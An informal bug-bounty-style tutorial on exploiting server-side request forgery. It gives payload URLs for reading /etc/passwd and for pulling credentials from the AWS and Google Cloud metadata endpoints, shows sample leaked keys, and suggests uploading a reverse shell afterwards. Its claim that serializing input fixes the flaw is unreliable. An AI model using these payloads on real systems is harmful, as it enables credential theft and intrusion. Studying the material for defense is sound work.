Introduction

hey folks! what’s up? This is my second artice about ssrf exploitation if you doesn’t read part 1 you can read it from in this article here I divided ssrf there in two types according to my resarch blind ssrf and untrusted input So, i picked up remote code execution via untrusted input in ssrf and also discuss about role of ssrf in xxe and request smuggling and next article will be about all of chaining bugs with ssrf :p I also wanna cover Os command injection and bypassing admin panel dashboard with server side request forgery but for the sake of length i decided to shortern this article

Basic Plot Overview

This post is gonna all about obtaining remote code execution with ssrf since it’s not bigginer friendly article i hope so you have clear concept about url terminology if you have any uncleared concept about methedology of url then you can read it from the article written by my friend here For the concept of ssrf back end db and how data fetch from url is so important without these concept you can’t fully undertsand ssrf let me tell you a example:- this is not real word example

suppose you’r friend asking a birthday gift from you and you send it via from an courier let’s talk this example in application way in this example you are back end, let’s say courierman is server and your friend is user what’s happening here same as above the example you (back end) giving data to server(courier man) but server doesn’t have understanding of giving data his job is to send data taken from backbend and serving to user. User fetch data from server by issuing requests that’s all

Exploitation

every web server contains confidential files which which is used for db-config,admin-config,phpinfo(),etc. since we know how a normal user fetch data from server by issuing a request let’s take an anothher example suupose we have a url : https://www.forttesting.com?file=500.png here we have a url what’s happening here a parameter names file is fetching 500.png file from webserver but happens if we replace it to https://www.forttesting.com?file=file:///etc/passwd It gives us files of users on server file:// is a protocal we talk about this protocols in later sections It gives us everything blindly if there is no input sanitization like https://www.forttesting.com?file=http://localhost In above piece of exploit if there is ssrf vulnerablity present on server we can download full data of localhost by using wget that was basic extraction of files but this will be considered as code injection So. for obtaining rce you have to some knowledge about cloud computing if you don’t have don’t worry read it later there are mostly two type of cloud plateforms used widely google cloud and amazon web services let’s talk about amazon web services http://169.254.169.254/latest/meta-data/iam/security-credentials/ this endpoint will leak the list of roles of user with their security credentials there are other many endpoint by exploiting we can obtain rce in aws but this one is my favourite so i wrote this in article okay! here is list of endpoint of aws we can disclose while exploiting ssrf

http://instance-data
http://169.254.169.254
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
payload-credit- cobalt.io

here i found few payloads on cobalt o i added in articles So after issuing https://www.forttesting.com?file=http://169.254.169.254/latest/meta-data/iam/security-credentials you will get access key id, password, etc. like this: { “LastUpdated” : “2019–08–03T20:42:03Z”,“Type” : “AWS-HMAC”, “AccessKeyId” : “ASIA5A6IYGGDLBWIFH5UQ”, “SecretAccessKey” : “sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR”,“Token” : “AgoJb3JpZ2luX2VjEH0aCXVzLWVhc3QtMSJHMEUCIQDFoFMUFs+lth0JM2lEddR/8LRHwdB4HiT1MBpEg8d+EAIgCKqMjkjdET/XjgYGDf9/eoNh1+5Xo/tnmDs“Expiration” : “2019–08–04T03:16:50Z” }

then just setup aws-cli and hack the web application byt uploading reverse shell that’s all about aws cli we can hack the user roles and simply hacking the web application of aws now in google cloud method is same of extracting informattion and files but endpoint is unique

http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
that’s how rce works in ssrf we can patch ssrf by serializing the input Now, how ssrf works with other bugs let’s consider http request smuggling we send data via chunked but how ssrf plays a vital role in this vulnerablity? as i said earlier sever is very innocent who doesn’t know what to send In request smuggling vulnerablity the user manuplates the back end by isuuing chunked and craft malicious header so with the help of ssrf http request smuggling can extract dangreous files which leads to harm to the website
I also wanna tak about xml injection with ssrf but since, article is getting longer so, i end this article here and check the resouirces they have awesome writeups about ssrf
https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/

For further refrence:

My First Bug: Blind SSRF Through Profile Picture Upload A writeup of my first bug! infosecwriteups.com

SSRF (Server Side Request Forgery) If the server is correctly protected you could bypass all the restrictions by exploiting an Open Redirect inside the… book.hacktricks.xyz

How To: Server-Side Request Forgery (SSRF) Server-Side Request Forgery, SSRF for short, is a vulnerability class that describes the behavior of a server making a… www.hackerone.com